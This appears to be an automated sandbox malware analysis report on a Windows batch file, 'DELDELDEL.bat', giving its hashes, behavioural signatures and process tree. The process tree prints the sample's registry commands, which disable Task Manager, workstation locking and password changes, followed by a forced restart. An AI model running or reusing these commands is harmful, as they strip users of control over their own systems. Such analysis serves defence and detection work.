Analysis

  • max time kernel
    115s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/10/2023, 08:11

Errors

Reason
Machine shutdown

General

  • Target

    DELDELDEL.bat

  • Size

    1KB

  • MD5

    1eb0b568ed636ab110f4593ee56c4095

  • SHA1

    7a68987ddef833b90f261f9be396eb5f2ad33cb5

  • SHA256

    23ed6e23e05842129fbf173ee81c8eee98a0192fc8eef312dd1a0b05bcc62159

  • SHA512

    d88a86effed3d675479ea15bf83f028965aef4959e33e8e20496e6427fa136a0efae251680b3846bca7bdaece8f1952fcc154fd483be48219b18c5cc32ae9000

Score
8/10

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry key 1 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DELDELDEL.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1160
    • C:\Windows\system32\choice.exe
      choice /c yn
      2⤵
        PID:4696
      • C:\Windows\system32\PING.EXE
        ping localhost -n 3
        2⤵
        • Runs ping.exe
        PID:224
      • C:\Windows\system32\reg.exe
        reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
        2⤵
        • Modifies registry key
        PID:4652
      • C:\Windows\system32\reg.exe
        REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        2⤵
        • Modifies registry key
        PID:4888
      • C:\Windows\system32\reg.exe
        REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkStation /t REG_DWORD /d 1 /f
        2⤵
        • Modifies registry key
        PID:2644
      • C:\Windows\system32\reg.exe
        REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
        2⤵
        • Modifies registry key
        PID:2120
      • C:\Windows\system32\reg.exe
        REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1/f
        2⤵
        • Modifies registry key
        PID:4936
      • C:\Windows\system32\timeout.exe
        timeout 8
        2⤵
        • Delays execution with timeout.exe
        PID:1376
      • C:\Windows\system32\shutdown.exe
        shutdown -r -t 60
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4392
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x4 /state0:0xa395a855 /state1:0x41c64e6d
      1⤵
      • Modifies data under HKEY_USERS
      • Suspicious use of SetWindowsHookEx
      PID:3416

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads